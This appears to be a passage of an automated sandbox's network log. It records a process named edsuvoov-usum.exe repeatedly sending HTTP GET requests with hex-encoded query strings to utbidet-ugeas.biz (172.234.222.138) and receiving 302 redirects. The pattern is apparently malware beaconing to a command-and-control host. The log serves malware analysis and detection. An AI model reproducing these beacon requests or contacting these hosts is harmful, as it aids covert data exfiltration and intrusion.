                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                            Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>openresty</center></body></html>


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            28192.168.2.361355172.234.222.138808004C:\Windows\SysWOW64\edsuvoov-usum.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            Sep 7, 2024 15:34:28.308815956 CEST169OUTGET /d/N?027E8E5D79798E5D794C8E75797E8ED3AAEAB6F5237F8E9DD17C8D6B574CA0644B4EBE7379 HTTP/1.0
                                                                                                                                                                                                            Host: utbidet-ugeas.biz
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0)
                                                                                                                                                                                                            Sep 7, 2024 15:34:28.794915915 CEST541INHTTP/1.1 302 Moved Temporarily
                                                                                                                                                                                                            Server: openresty
                                                                                                                                                                                                            Date: Sat, 07 Sep 2024 13:34:28 GMT
                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                            Content-Length: 142
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Accept-CH: Sec-CH-UA, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version, Sec-CH-UA-Mobile
                                                                                                                                                                                                            Location: http://ww99.utbidet-ugeas.biz/d/N?027E8E5D79798E5D794C8E75797E8ED3AAEAB6F5237F8E9DD17C8D6B574CA0644B4EBE7379
                                                                                                                                                                                                            Cache-Control: no-store, max-age=0
                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                            Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>openresty</center></body></html>


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            29192.168.2.361356172.234.222.138808004C:\Windows\SysWOW64\edsuvoov-usum.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            Sep 7, 2024 15:34:28.800782919 CEST201OUTGET /d/N?027E8E5D79798E5D794C8E75797E8ED3AAEAB6F5237F8E9DD17C8D6B574CA0644B4EBE7379 HTTP/1.1
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32)
                                                                                                                                                                                                            Host: utbidet-ugeas.biz
                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                            Sep 7, 2024 15:34:29.284914017 CEST546INHTTP/1.1 302 Moved Temporarily
                                                                                                                                                                                                            Server: openresty
                                                                                                                                                                                                            Date: Sat, 07 Sep 2024 13:34:29 GMT
                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                            Content-Length: 142
                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                            Accept-CH: Sec-CH-UA, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version, Sec-CH-UA-Mobile
                                                                                                                                                                                                            Location: http://ww99.utbidet-ugeas.biz/d/N?027E8E5D79798E5D794C8E75797E8ED3AAEAB6F5237F8E9DD17C8D6B574CA0644B4EBE7379
                                                                                                                                                                                                            Cache-Control: no-store, max-age=0
                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                            Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>openresty</center></body></html>


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            30192.168.2.361358172.234.222.138808004C:\Windows\SysWOW64\edsuvoov-usum.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            Sep 7, 2024 15:34:30.578511000 CEST169OUTGET /d/N?02DEF47E9BD9F47E9BECF4569BDEF4F0484ACCD6C1DFF4BE33DCF748B5ECDA47A9EEC4509B HTTP/1.0
                                                                                                                                                                                                            Host: utbidet-ugeas.biz
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0)
                                                                                                                                                                                                            Sep 7, 2024 15:34:31.065511942 CEST541INHTTP/1.1 302 Moved Temporarily
                                                                                                                                                                                                            Server: openresty
                                                                                                                                                                                                            Date: Sat, 07 Sep 2024 13:34:31 GMT
                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                            Content-Length: 142
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Accept-CH: Sec-CH-UA, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version, Sec-CH-UA-Mobile
                                                                                                                                                                                                            Location: http://ww99.utbidet-ugeas.biz/d/N?02DEF47E9BD9F47E9BECF4569BDEF4F0484ACCD6C1DFF4BE33DCF748B5ECDA47A9EEC4509B
                                                                                                                                                                                                            Cache-Control: no-store, max-age=0
                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                            Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>openresty</center></body></html>


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            31192.168.2.361359172.234.222.138808004C:\Windows\SysWOW64\edsuvoov-usum.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            Sep 7, 2024 15:34:31.076946020 CEST201OUTGET /d/N?02DEF47E9BD9F47E9BECF4569BDEF4F0484ACCD6C1DFF4BE33DCF748B5ECDA47A9EEC4509B HTTP/1.1
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32)
                                                                                                                                                                                                            Host: utbidet-ugeas.biz
                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                            Sep 7, 2024 15:34:31.589180946 CEST546INHTTP/1.1 302 Moved Temporarily
                                                                                                                                                                                                            Server: openresty
                                                                                                                                                                                                            Date: Sat, 07 Sep 2024 13:34:31 GMT
                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                            Content-Length: 142
                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                            Accept-CH: Sec-CH-UA, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version, Sec-CH-UA-Mobile
                                                                                                                                                                                                            Location: http://ww99.utbidet-ugeas.biz/d/N?02DEF47E9BD9F47E9BECF4569BDEF4F0484ACCD6C1DFF4BE33DCF748B5ECDA47A9EEC4509B
                                                                                                                                                                                                            Cache-Control: no-store, max-age=0
                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                            Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>openresty</center></body></html>


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            32192.168.2.361361172.234.222.138808004C:\Windows\SysWOW64\edsuvoov-usum.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            Sep 7, 2024 15:34:32.500462055 CEST169OUTGET /d/N?025085CC3A5785CC3A6285E43A508542E9C4BD646051850C925286FA1462ABF50860B5E23A HTTP/1.0
                                                                                                                                                                                                            Host: utbidet-ugeas.biz
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0)
                                                                                                                                                                                                            Sep 7, 2024 15:34:33.011301041 CEST541INHTTP/1.1 302 Moved Temporarily
                                                                                                                                                                                                            Server: openresty
                                                                                                                                                                                                            Date: Sat, 07 Sep 2024 13:34:32 GMT
                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                            Content-Length: 142
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Accept-CH: Sec-CH-UA, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version, Sec-CH-UA-Mobile
                                                                                                                                                                                                            Location: http://ww99.utbidet-ugeas.biz/d/N?025085CC3A5785CC3A6285E43A508542E9C4BD646051850C925286FA1462ABF50860B5E23A
                                                                                                                                                                                                            Cache-Control: no-store, max-age=0
                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                            Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>openresty</center></body></html>


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            33192.168.2.361362172.234.222.138808004C:\Windows\SysWOW64\edsuvoov-usum.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            Sep 7, 2024 15:34:33.017327070 CEST201OUTGET /d/N?025085CC3A5785CC3A6285E43A508542E9C4BD646051850C925286FA1462ABF50860B5E23A HTTP/1.1
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32)
                                                                                                                                                                                                            Host: utbidet-ugeas.biz
                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                            Sep 7, 2024 15:34:33.497728109 CEST546INHTTP/1.1 302 Moved Temporarily
                                                                                                                                                                                                            Server: openresty
                                                                                                                                                                                                            Date: Sat, 07 Sep 2024 13:34:33 GMT
                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                            Content-Length: 142
                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                            Accept-CH: Sec-CH-UA, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version, Sec-CH-UA-Mobile
                                                                                                                                                                                                            Location: http://ww99.utbidet-ugeas.biz/d/N?025085CC3A5785CC3A6285E43A508542E9C4BD646051850C925286FA1462ABF50860B5E23A
                                                                                                                                                                                                            Cache-Control: no-store, max-age=0
                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                            Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>openresty</center></body></html>


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            34192.168.2.361364172.234.222.138808004C:\Windows\SysWOW64\edsuvoov-usum.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            Sep 7, 2024 15:34:34.507396936 CEST169OUTGET /d/N?02A8ABCE52AFABCE529AABE652A8AB40813C936608A9AB0EFAAAA8F87C9A85F760989BE052 HTTP/1.0
                                                                                                                                                                                                            Host: utbidet-ugeas.biz
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0)
                                                                                                                                                                                                            Sep 7, 2024 15:34:34.984854937 CEST541INHTTP/1.1 302 Moved Temporarily
                                                                                                                                                                                                            Server: openresty
                                                                                                                                                                                                            Date: Sat, 07 Sep 2024 13:34:34 GMT
                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                            Content-Length: 142
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Accept-CH: Sec-CH-UA, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version, Sec-CH-UA-Mobile
                                                                                                                                                                                                            Location: http://ww99.utbidet-ugeas.biz/d/N?02A8ABCE52AFABCE529AABE652A8AB40813C936608A9AB0EFAAAA8F87C9A85F760989BE052
                                                                                                                                                                                                            Cache-Control: no-store, max-age=0
                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                            Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>openresty</center></body></html>


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            35192.168.2.361365172.234.222.138808004C:\Windows\SysWOW64\edsuvoov-usum.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            Sep 7, 2024 15:34:34.992314100 CEST201OUTGET /d/N?02A8ABCE52AFABCE529AABE652A8AB40813C936608A9AB0EFAAAA8F87C9A85F760989BE052 HTTP/1.1
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32)
                                                                                                                                                                                                            Host: utbidet-ugeas.biz
                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                            Sep 7, 2024 15:34:35.500749111 CEST546INHTTP/1.1 302 Moved Temporarily
                                                                                                                                                                                                            Server: openresty
                                                                                                                                                                                                            Date: Sat, 07 Sep 2024 13:34:35 GMT
                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                            Content-Length: 142
                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                            Accept-CH: Sec-CH-UA, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version, Sec-CH-UA-Mobile
                                                                                                                                                                                                            Location: http://ww99.utbidet-ugeas.biz/d/N?02A8ABCE52AFABCE529AABE652A8AB40813C936608A9AB0EFAAAA8F87C9A85F760989BE052
                                                                                                                                                                                                            Cache-Control: no-store, max-age=0
                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                            Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>openresty</center></body></html>


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            36192.168.2.361367172.234.222.138808004C:\Windows\SysWOW64\edsuvoov-usum.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            Sep 7, 2024 15:34:36.647886038 CEST169OUTGET /d/N?02B2F2472FB5F2472F80F26F2FB2F2C9FC26CAEF75B3F28787B0F1710180DC7E1D82C2692F HTTP/1.0
                                                                                                                                                                                                            Host: utbidet-ugeas.biz
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0)
                                                                                                                                                                                                            Sep 7, 2024 15:34:37.135874033 CEST541INHTTP/1.1 302 Moved Temporarily
                                                                                                                                                                                                            Server: openresty
                                                                                                                                                                                                            Date: Sat, 07 Sep 2024 13:34:37 GMT
                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                            Content-Length: 142
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Accept-CH: Sec-CH-UA, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version, Sec-CH-UA-Mobile
                                                                                                                                                                                                            Location: http://ww99.utbidet-ugeas.biz/d/N?02B2F2472FB5F2472F80F26F2FB2F2C9FC26CAEF75B3F28787B0F1710180DC7E1D82C2692F
                                                                                                                                                                                                            Cache-Control: no-store, max-age=0
                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                            Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>openresty</center></body></html>


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            37192.168.2.361368172.234.222.138808004C:\Windows\SysWOW64\edsuvoov-usum.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            Sep 7, 2024 15:34:37.142235994 CEST201OUTGET /d/N?02B2F2472FB5F2472F80F26F2FB2F2C9FC26CAEF75B3F28787B0F1710180DC7E1D82C2692F HTTP/1.1
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32)
                                                                                                                                                                                                            Host: utbidet-ugeas.biz
                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                            Sep 7, 2024 15:34:37.722342968 CEST546INHTTP/1.1 302 Moved Temporarily
                                                                                                                                                                                                            Server: openresty
                                                                                                                                                                                                            Date: Sat, 07 Sep 2024 13:34:37 GMT
                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                            Content-Length: 142
                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                            Accept-CH: Sec-CH-UA, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version, Sec-CH-UA-Mobile
                                                                                                                                                                                                            Location: http://ww99.utbidet-ugeas.biz/d/N?02B2F2472FB5F2472F80F26F2FB2F2C9FC26CAEF75B3F28787B0F1710180DC7E1D82C2692F
                                                                                                                                                                                                            Cache-Control: no-store, max-age=0
                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                            Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>openresty</center></body></html>


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            38192.168.2.361370172.234.222.138808004C:\Windows\SysWOW64\edsuvoov-usum.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            Sep 7, 2024 15:34:38.335453033 CEST169OUTGET /d/N?02263F721B213F721B143F5A1B263FFCC8B207DA41273FB2B3243C443514114B29160F5C1B HTTP/1.0
                                                                                                                                                                                                            Host: utbidet-ugeas.biz
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0)
                                                                                                                                                                                                            Sep 7, 2024 15:34:38.808603048 CEST541INHTTP/1.1 302 Moved Temporarily
                                                                                                                                                                                                            Server: openresty
                                                                                                                                                                                                            Date: Sat, 07 Sep 2024 13:34:38 GMT
                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                            Content-Length: 142
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Accept-CH: Sec-CH-UA, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version, Sec-CH-UA-Mobile
                                                                                                                                                                                                            Location: http://ww99.utbidet-ugeas.biz/d/N?02263F721B213F721B143F5A1B263FFCC8B207DA41273FB2B3243C443514114B29160F5C1B
                                                                                                                                                                                                            Cache-Control: no-store, max-age=0
                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                            Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>openresty</center></body></html>


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            39192.168.2.361371172.234.222.138808004C:\Windows\SysWOW64\edsuvoov-usum.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            Sep 7, 2024 15:34:38.820116043 CEST201OUTGET /d/N?02263F721B213F721B143F5A1B263FFCC8B207DA41273FB2B3243C443514114B29160F5C1B HTTP/1.1
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32)
                                                                                                                                                                                                            Host: utbidet-ugeas.biz
                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                            Sep 7, 2024 15:34:39.300848961 CEST546INHTTP/1.1 302 Moved Temporarily
                                                                                                                                                                                                            Server: openresty
                                                                                                                                                                                                            Date: Sat, 07 Sep 2024 13:34:39 GMT
                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                            Content-Length: 142
                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                            Accept-CH: Sec-CH-UA, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version, Sec-CH-UA-Mobile
                                                                                                                                                                                                            Location: http://ww99.utbidet-ugeas.biz/d/N?02263F721B213F721B143F5A1B263FFCC8B207DA41273FB2B3243C443514114B29160F5C1B
                                                                                                                                                                                                            Cache-Control: no-store, max-age=0
                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                            Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>openresty</center></body></html>


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            40192.168.2.361373172.234.222.138808004C:\Windows\SysWOW64\edsuvoov-usum.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            Sep 7, 2024 15:34:39.460485935 CEST169OUTGET /d/N?0249C8E2654EC8E2657BC8CA6549C86CB6DDF04A3F48C822CD4BCBD44B7BE6DB5779F8CC65 HTTP/1.0
                                                                                                                                                                                                            Host: utbidet-ugeas.biz
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0)
                                                                                                                                                                                                            Sep 7, 2024 15:34:39.930893898 CEST541INHTTP/1.1 302 Moved Temporarily
                                                                                                                                                                                                            Server: openresty
                                                                                                                                                                                                            Date: Sat, 07 Sep 2024 13:34:39 GMT
                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                            Content-Length: 142
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Accept-CH: Sec-CH-UA, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version, Sec-CH-UA-Mobile
                                                                                                                                                                                                            Location: http://ww99.utbidet-ugeas.biz/d/N?0249C8E2654EC8E2657BC8CA6549C86CB6DDF04A3F48C822CD4BCBD44B7BE6DB5779F8CC65
                                                                                                                                                                                                            Cache-Control: no-store, max-age=0
